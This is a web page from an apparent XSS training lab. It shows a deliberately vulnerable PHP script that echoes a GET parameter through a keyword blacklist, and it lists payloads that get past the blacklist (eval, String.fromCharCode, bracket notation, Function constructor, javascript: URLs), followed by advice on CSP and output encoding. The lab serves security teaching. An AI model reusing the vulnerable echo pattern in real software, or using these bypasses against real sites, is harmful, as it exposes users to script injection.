Reflected XSS Bootcamp

Complete Challenge: Total Function Filter Bypass

Complete Function Filter Challenge

Lab Overview

This is the ultimate function filtering challenge! The filter now blocks ALL three common dialog functions: 'alert', 'confirm', and 'prompt', along with multiple HTML tags.

Complete Function Blocking: The filter now blocks 'prompt' in addition to 'alert' and 'confirm', closing the last major dialog function vector!
Complete Function Filter: Blocks 12 case variations of 'script' plus 'img', 'image', 'audio', 'video', 'body', 'alert', 'confirm', and 'prompt'
Blocked tags and functions:
script
Script
sCript
scRipt
scrIpt
scriPt
scripT
SCript
SCRipt
SCRIpt
SCRIPt
SCRIPT
img
image
audio
video
body
alert
confirm
prompt
Filter method: str_replace(array('script','Script',...,'alert','confirm','prompt'), '', $_GET['lname'])
Filter Complexity: Complete Function-Level Filtering

Objective: Bypass the complete function filter and execute JavaScript code, even though all dialog functions are blocked.

Note: Only the Last Name field is filtered and displayed. The First Name field is unfiltered but not used in output.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    $arr = array('script','Script','sCript','scRipt',
                'scrIpt','scriPt','scripT','SCript',
                'SCRipt','SCRIpt','SCRIPt','SCRIPT',
                'img','image','alert','confirm','prompt',
                'audio','video','body');
    $re = str_replace($arr, '', $_GET['lname']);
    echo $re;
}
Test Input Form
This field has no filters but is not displayed in output
This field has 20 filters including ALL dialog functions blocked
Ultimate Function Bypass Techniques
  • Alternative output methods: Use console.log(), document.write(), document.title, location.href, or manipulate DOM elements
  • Create custom functions: Define your own alert function: function a(){window.alert(1)};a()
  • Global object reflection: Access functions through reflection: window['al'+'ert'], this['al'+'ert'], self['al'+'ert']
  • Advanced encoding: Use multiple encoding layers: HTML entities, URL encoding, Unicode, Base64
  • Dynamic evaluation: Use eval(), Function(), setTimeout(), setInterval() with encoded payloads
  • String manipulation: Build function names with concatenation, template literals, or array methods
  • Character code conversion: Use String.fromCharCode() to build any function name
  • Alternative calling patterns: Use .call(), .apply(), or indirect evaluation
  • DOM-based alternatives: Create elements, modify styles, trigger events for visible effects
  • Error-based execution: Cause JavaScript errors or use error handlers
  • Property descriptor access: Use Object.getOwnPropertyDescriptor(window,'alert').value
  • Proxy and reflection APIs: Use advanced JavaScript features for indirect execution
Security Implications

Complete function blocking demonstrates:

  • JavaScript execution cannot be prevented by blocking function names
  • The language provides infinite ways to execute code
  • Function name filtering provides a false sense of security
  • Attackers can always find alternative execution paths
  • Proper output encoding is the only reliable defense
  • Content Security Policy (CSP) is necessary for real protection
Enterprise Defense Strategies

For production-grade XSS prevention:

  • Implement strict Content Security Policy (CSP) headers
  • Use context-aware output encoding for all dynamic content
  • Validate input using strict whitelists, not blacklists
  • Use modern sanitization libraries (DOMPurify, etc.)
  • Implement Trusted Types for DOM XSS protection
  • Use security headers: X-XSS-Protection, X-Content-Type-Options
  • Conduct regular security testing and code reviews
Complete Bypass Examples
Custom Function Creation:
  • function x(){window.alert(1)};x()
  • window.a=window.alert;a(1)
  • eval('window["al"+"ert"](1)')
  • setTimeout('window.alert(1)')
Alternative Output Methods:
  • console.log(1) - Browser console
  • document.title=1 - Page title
  • document.body.innerHTML=1 - Page content
  • location.href='javascript:alert(1)' - Navigation
Advanced Encoding Examples:
  • eval('\\u0061lert(1)') - Unicode escape
  • eval('al'+String.fromCharCode(101,114,116)+'(1)') - Character codes
  • Function('al'+'ert(1)')() - Function constructor
  • top['al'+'ert'](1) - Bracket notation
Mastering Function Filter Bypass
Level 1
Single Function
alert
Level 2
Multiple Functions
alert, confirm
Level 3
Complete Blocking
alert, confirm, prompt

You've reached the ultimate function filtering challenge! This demonstrates that even when all common dialog functions are blocked, JavaScript execution remains possible through creative techniques.

Remember: Function name filtering is not a security control - proper output encoding and CSP are the real defenses.